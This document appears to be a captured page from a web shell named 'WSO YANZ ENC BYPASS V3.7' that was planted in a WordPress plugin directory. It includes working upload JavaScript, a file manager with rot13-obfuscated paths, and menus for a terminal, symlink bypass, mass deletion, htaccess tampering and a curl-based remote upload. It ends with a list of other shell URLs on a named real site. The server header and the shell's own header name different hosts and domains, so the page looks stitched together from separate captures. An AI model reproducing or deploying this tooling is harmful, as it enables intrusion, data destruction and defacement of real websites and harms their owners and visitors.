HEX
Server: LiteSpeed
System: Linux shams.tasjeel.ae 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
User: infowars (1469)
PHP: 8.2.29
Disabled: NONE
$ pwd: /home/infowars/public_html/wp-content/plugins/seooyanz/
Upload Files
File: /home/infowars/public_html/wp-content/plugins/seooyanz/wsoyanzv3.7.php
<script>
function upload(fileInputId, fileIndex)
    {
		var url = window.location.pathname;
		var scriptname = url.substring(url.lastIndexOf('/')+1);
		var filename = document.getElementById('upload_files').value;
		var filename = filename.match(/[^\\/]*$/)[0];
		var location = window.location.href;
		var directoryPath = location.substring(0, location.lastIndexOf("/")+1);
		document.getElementById("status").textContent = "Uploading the file "+filename+", please wait..";
		document.getElementById("status").style.color = "blue";
        // take the file from the input
        var file = document.getElementById(fileInputId).files[fileIndex];
        var reader = new FileReader();
        reader.readAsBinaryString(file); // alternatively you can use readAsDataURL
        reader.onloadend  = function(evt)
        {
                // create XHR instance
                xhr = new XMLHttpRequest();

                // send the file through POST
                xhr.open("POST", scriptname+"?name="+filename, true);

                // make sure we have the sendAsBinary method on all browsers
                XMLHttpRequest.prototype.mySendAsBinary = function(text){
                    var data = new ArrayBuffer(text.length);
                    var ui8a = new Uint8Array(data, 0);
                    for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);

                    if(typeof window.Blob == "function")
                    {
                         var blob = new Blob([data]);
                    }else{
                         var bb = new (window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder)();
                         bb.append(data);
                         var blob = bb.getBlob();
                    }

                    this.send(blob);
                }

                // let's track upload progress
                var eventSource = xhr.upload || xhr;
                eventSource.addEventListener("progress", function(e) {
                    // get percentage of how much of the current file has been sent
                    var position = e.position || e.loaded;
                    var total = e.totalSize || e.total;
                    var percentage = Math.round((position/total)*100);

                    // here you should write your own code how you wish to proces this
                });

                // state change observer - we need to know when and if the file was successfully uploaded
                xhr.onreadystatechange = function()
                {
                    if(xhr.readyState == 4)
                    {
                        if(xhr.status == 200)
                        {
                            // process success
							document.getElementById("status").textContent = "The file "+filename+" Uploaded successfully in same folder as Shell. At Link= "+directoryPath+filename;
							document.getElementById("status").style.color = "green";
                        }else{
                            // process error
                        }
                    }
                };

                // start sending
                xhr.mySendAsBinary(evt.target.result);
        };
    }
</script>

<html><link rel='icon' href='https://e.top4top.io/p_26973oc9i1.png' sizes='20x20' type='image/png'><html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>fashionsmag.co.uk - WSO YANZ ENC BYPASS V3.7</title>
		<style>body{background-color:#444;color:#e1e1e1;}body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1;}table.info{color:#fff;background-color:#222;}span,h1,a{color: #df5 !important;}span{font-weight: bolder;}span.wfw{font-weight:normal;}h1{border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;}div.content{padding: 5px;margin-left:5px;background-color:#333;}a{text-decoration:none;}a:hover{text-decoration:underline;}.ml1{border:1px solid #444;padding:5px;margin:0;overflow: auto;}.bigarea{width:100%;height:300px;}input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New';}form{margin:0px;}#toolsTbl{text-align:center;}.toolsInp{width:500px}.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style>
<script>
var c_ = '/ubzr/cvaxfxha/snfuvbafznt.pb.hx/jc-pbagrag/cyhtvaf/frbblnam/';
var a_ = ''
var ch_ = 'Windows-1251';
var p_ = '';
var x_ = '';
var s_ = '';
var d = document;
function set(a,c,p,x,s,ch){if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;if(p!=null)d.mf.p.value=p;else d.mf.p.value=p_;if(x!=null)d.mf.x.value=x;else d.mf.x.value=x_;if(s!=null)d.mf.s.value=s;else d.mf.s.value=s_;if(ch!=null)d.mf.ch.value=ch;else d.mf.ch.value=ch_;}function g(a,c,p,x,s,ch){set(a,c,p,x,s,ch);d.mf.submit();}function utoa(str){return window.btoa(unescape(encodeURIComponent(str)));}function atou(str){return decodeURIComponent(escape(window.atob(str)));}function rot13(str){var input='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; var output='NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm'; var index=x=> input.indexOf(x); var translate=x=> index(x) > -1 ? output[index(x)] : x; return str.split('').map(translate).join('');}var cvis=false;function show(){if(!cvis){document.getElementById('bat').innerHTML='Links';document.getElementById('cwd').style.display='inline';document.getElementById('links').style.display='none';cvis=true;}else{document.getElementById('bat').innerHTML='Text';document.getElementById('cwd').style.display='none';document.getElementById('links').style.display='inline';cvis=false;}}
</script>
</head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p>
<input type=hidden name=x>
<input type=hidden name=s>
<input type=hidden name=ch>
</form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span><font color=red>Attention:</font><br>Uname:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><a href='https://t.me/yanz54321'</a><u><b>Yanz Webshell!</b> - PRIV8 WEB SHELL ORB YANZ BYPASS! V3.7</u></a><br><nobr>Linux cpl111.hosting24.com 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64</nobr><br>8.4.1 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <span>Datetime:</span> 2025-03-12 08:42:46<br>7095.27 GB <span>Free:</span> 1649.62 GB (23%)<br><span id="links" class="wfw"><a href='#' onclick='g("fm","/","","")'>/</a><a href='#' onclick='g("fm","/ubzr/","","")'>home/</a><a href='#' onclick='g("fm","/ubzr/cvaxfxha/","","")'>pinkskun/</a><a href='#' onclick='g("fm","/ubzr/cvaxfxha/snfuvbafznt.pb.hx/","","")'>fashionsmag.co.uk/</a><a href='#' onclick='g("fm","/ubzr/cvaxfxha/snfuvbafznt.pb.hx/jc-pbagrag/","","")'>wp-content/</a><a href='#' onclick='g("fm","/ubzr/cvaxfxha/snfuvbafznt.pb.hx/jc-pbagrag/cyhtvaf/","","")'>plugins/</a><a href='#' onclick='g("fm","/ubzr/cvaxfxha/snfuvbafznt.pb.hx/jc-pbagrag/cyhtvaf/frbblnam/","","")'>seooyanz/</a> <font color=#25ff00>drwxr-xr-x</font> <a href=# onclick="g('fm','/ubzr/cvaxfxha/snfuvbafznt.pb.hx','','','')">[ root ]</a> <a href=# onclick="g('fm','/ubzr/cvaxfxha/snfuvbafznt.pb.hx/jc-pbagrag/cyhtvaf/frbblnam','','','')">[ home ]</a></span><span id="cwd" style="display: none;" class="wfw"><input size=83 type=text value="/home/pinkskun/fashionsmag.co.uk/wp-content/plugins/seooyanz/"></span> <a href=# onclick="show();"><font color=#fff id="bat">Text</font></a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br>93.127.192.229<br><span>Client IP:</span><br>114.10.78.114<br><a href=?ynzmini=/home/pinkskun/fashionsmag.co.uk/wp-content/plugins/seooyanz>[YANZ MINI SHELL BYPASS]</a></nobr></td><td width="1" align="left"><nobr><img itemprop="line" height="100" width="30" src="https://a.top4top.io/p_2263b6a5p1.png"><a target="_blank" rel="noopener noreferrer" href="https://t.me/yanz54321"><img src="https://e.top4top.io/p_26973oc9i1.png" width="120" height="100" title="YanzWSO" alt="YanzWSO"></a></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="6%">[ <a href="#" onclick="g('fm',null,'','','')">Files</a> ]</th><th width="6%">[ <a href="#" onclick="g('Masfix',null,'','','')">Masfix Bypass</a> ]</th><th width="6%">[ <a href="#" onclick="g('sym',null,'','','')">Symlink403</a> ]</th><th width="6%">[ <a href="#" onclick="g('sym404',null,'','','')">Symlink404</a> ]</th><th width="6%">[ <a href="#" onclick="g('vhost',null,'','','')">Vhost</a> ]</th><th width="6%">[ <a href="#" onclick="g('wpautoedit',null,'','','')">WpAutoedit</a> ]</th><th width="6%">[ <a href="#" onclick="g('readdomains',null,'','','')">ReadDomains</a> ]</th><th width="6%">[ <a href="#" onclick="g('killproccess',null,'','','')">KillProccess</a> ]</th><th width="6%">[ <a href="#" onclick="g('terminalv2',null,'','','')">TerminalV2</a> ]</th><th width="6%">[ <a href="#" onclick="g('adminer',null,'','','')">Adminer</a> ]</th><th width="6%">[ <a href="#" onclick="g('wpdownloader',null,'','','')">WpDownloader</a> ]</th><th width="6%">[ <a href="#" onclick="g('vhost2',null,'','','')">Vhost W4r10k</a> ]</th><th width="6%">[ <a href="#" onclick="g('masshta',null,'','','')">MassHtacces</a> ]</th><th width="6%">[ <a href="#" onclick="g('massdelete',null,'','','')">MassDelete</a> ]</th><th width="6%">[ <a href="#" onclick="g('massindox',null,'','','')">MassIndoXploit</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p_=x_=s_="";</script><script>function sa(){for(i=0;i<d.files.elements.length;i++)if(d.files.elements[i].type=='checkbox')d.files.elements[i].checked=d.files.elements[0].checked;}</script><table width='100%' class='main' cellspacing='0' cellpadding='2'><form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th width='40%'><a href='#' onclick='g("fm",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("fm",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("fm",null,"s_modify_0")'>Modify</a></th><th><a href='#' onclick='g("fm",null,"s_perms_0")'>Permissions</a></th><th width='200px'>Actions</th></tr><tr><td><input type=checkbox name="f[]" value="." class=chkbx></td><td><a href=# onclick="g('fm','/ubzr/cvaxfxha/snfuvbafznt.pb.hx/jc-pbagrag/cyhtvaf/frbblnam/.');" ><b>[ . ]</b></a></td><td>dir</td><td>2025-03-10 01:39:10</td><td><a href=# onclick="g('ft',null,'.','chmod')"><font color=#25ff00>drwxr-xr-x</font></td><td><a href="#" onclick="g('ft',null,'.', 'rename')">Rename</a> <a href="#" onclick="g('ft',null,'.', 'touch')">Touch</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('fm','/ubzr/cvaxfxha/snfuvbafznt.pb.hx/jc-pbagrag/cyhtvaf/frbblnam/..');" ><b>[ .. ]</b></a></td><td>dir</td><td>2025-03-11 23:24:03</td><td><a href=# onclick="g('ft',null,'..','chmod')"><font color=#25ff00>drwxr-xr-x</font></td><td><a href="#" onclick="g('ft',null,'..', 'rename')">Rename</a> <a href="#" onclick="g('ft',null,'..', 'touch')">Touch</a></td></tr><tr><td><input type=checkbox name="f[]" value="nfnfk.cuc" class=chkbx></td><td><a href=# onclick="g('ft',null,'nfnfk.cuc', 'view')">asasx.php</a></td><td>43.89 KB</td><td>2025-03-10 01:37:50</td><td><a href=# onclick="g('ft',null,'nfnfk.cuc','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('ft',null,'nfnfk.cuc', 'rename')">Rename</a> <a href="#" onclick="g('ft',null,'nfnfk.cuc', 'touch')">Touch</a> <a href="#" onclick="g('ft',null,'nfnfk.cuc', 'edit')">Edit</a> <a href="#" onclick="g('ft',null,'nfnfk.cuc', 'download')">Download</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="pbqrvaqrkymgrf.cuc" class=chkbx></td><td><a href=# onclick="g('ft',null,'pbqrvaqrkymgrf.cuc', 'view')">codeindexlztes.php</a></td><td>0 B</td><td>2025-03-10 01:39:49</td><td><a href=# onclick="g('ft',null,'pbqrvaqrkymgrf.cuc','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('ft',null,'pbqrvaqrkymgrf.cuc', 'rename')">Rename</a> <a href="#" onclick="g('ft',null,'pbqrvaqrkymgrf.cuc', 'touch')">Touch</a> <a href="#" onclick="g('ft',null,'pbqrvaqrkymgrf.cuc', 'edit')">Edit</a> <a href="#" onclick="g('ft',null,'pbqrvaqrkymgrf.cuc', 'download')">Download</a></td></tr><tr><td><input type=checkbox name="f[]" value="hou.cuc" class=chkbx></td><td><a href=# onclick="g('ft',null,'hou.cuc', 'view')">ubh.php</a></td><td>77 B</td><td>2025-03-10 01:37:50</td><td><a href=# onclick="g('ft',null,'hou.cuc','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('ft',null,'hou.cuc', 'rename')">Rename</a> <a href="#" onclick="g('ft',null,'hou.cuc', 'touch')">Touch</a> <a href="#" onclick="g('ft',null,'hou.cuc', 'edit')">Edit</a> <a href="#" onclick="g('ft',null,'hou.cuc', 'download')">Download</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="jfblnami3.7.cuc" class=chkbx></td><td><a href=# onclick="g('ft',null,'jfblnami3.7.cuc', 'view')">wsoyanzv3.7.php</a></td><td>127.68 KB</td><td>2025-03-10 01:37:50</td><td><a href=# onclick="g('ft',null,'jfblnami3.7.cuc','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('ft',null,'jfblnami3.7.cuc', 'rename')">Rename</a> <a href="#" onclick="g('ft',null,'jfblnami3.7.cuc', 'touch')">Touch</a> <a href="#" onclick="g('ft',null,'jfblnami3.7.cuc', 'edit')">Edit</a> <a href="#" onclick="g('ft',null,'jfblnami3.7.cuc', 'download')">Download</a></td></tr><tr><td colspan=7>
		<input type=hidden name=a value='fm'>
		<input type=hidden name=c value='/ubzr/cvaxfxha/snfuvbafznt.pb.hx/jc-pbagrag/cyhtvaf/frbblnam/'>
		<input type=hidden name=ch value='Windows-1251'>
		<select name='p'><option value='delete'>Delete</option></select>&nbsp;<input type='submit' value='>>'></td></tr></form></table></div></div><table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr><td><form onsubmit='g(null,rot13(this.c.value),"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/home/pinkskun/fashionsmag.co.uk/wp-content/plugins/seooyanz/'><input type=submit value='>>'></form></td><td><form onsubmit="g('ft',null,rot13(this.f.value));return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td></tr><tr><td><form onsubmit="g('fm',null,'mkdir',rot13(this.d.value));return false;"><span>Make dir:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td><td><form onsubmit="g('ft',null,rot13(this.f.value),'mkfile');return false;"><span>Make/Edit file Bypass:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td></tr><tr><td><form onsubmit="g('ce',null,utoa(this.c.value));return false;"></a></form><form method=post ><span>Terminal:</span><br><input class='toolsInp' type=text name=command value='' autocomplete='off'><input type=submit value='>>' name='subcmd'><br></form><br><span>Uploader URL v3 :</span> <font color='green'>(Writeable)</font><br><form method=post ><input type='hidden' name='type' value='upload' aria-label='hidden' aria-hidden='true'><input type='url' placeholder='URL' name='uploadurl' required class='form-control' style='width: 48%'><button type='submit' class='btn btn-primary ms-3' value='Upload'>Upload Via Curl</button></form><br><span>Uploader Bypass v4 :</span> <font color='green'>(Writeable)</font><br><form action=""enctype="multipart/form-data"method="post"><input type="file"name="file"> <input type="submit"value="Վերբեռնել"></form></td><span></td><td><form method='post' ENCTYPE='multipart/form-data'><span>Upload file Bypass v4.1:</span></form> <font color='green'>(Writeable)</font><br><form action=""enctype="multipart/form-data"method="post"><input class='toolsInp' type="file"name="file41"><input type=hidden name=a value='fm'><input type=hidden name=c value='/ubzr/cvaxfxha/snfuvbafznt.pb.hx/jc-pbagrag/cyhtvaf/frbblnam/'><input type=hidden name=ch value='Windows-1251'><input type=submit value='>>'></form><br>
<html><span>Uploader Bypass v2 :</span> <font color='green'>(Writeable)</font><br><input type="file" id="upload_files" name="upload_files" multiple="multiple">
<button id="b" value="upload" onclick='upload("upload_files",0);'>Upload</button>
<br><p>Status : <span id="status" style="color:red;">No file added</span></p><br>
<br  ></td></tr></table></div>></body></html>
https://fashionsmag.co.uk/wp-content/plugins/wp-file-manager/lib/codemirror/mode/gherkin/about.php	https://fashionsmag.co.uk/wp-content/plugins/wp-file-manager/lib/codemirror/mode/gherkin/about.php7	https://fashionsmag.co.uk/wp-content/plugins/wp-file-manager/lib/codemirror/mode/gherkin/wp-login.php	https://fashionsmag.co.uk/wp-content/plugins/wp-file-manager/lib/codemirror/mode/gherkin/alfa-rex.PhP7	https://fashionsmag.co.uk/wp-content/plugins/wp-file-manager/lib/codemirror/mode/gherkin/alfa-rex.php56	https://fashionsmag.co.uk/wp-content/plugins/wp-file-manager/lib/codemirror/mode/gherkin/alfa-rex.php8	https://fashionsmag.co.uk/wp-content/plugins/wp-file-manager/lib/codemirror/mode/gherkin/index.php	https://fashionsmag.co.uk/wp-content/plugins/wp-file-manager/lib/codemirror/mode/gherkin/alfa-rex.PHP
@ Telegram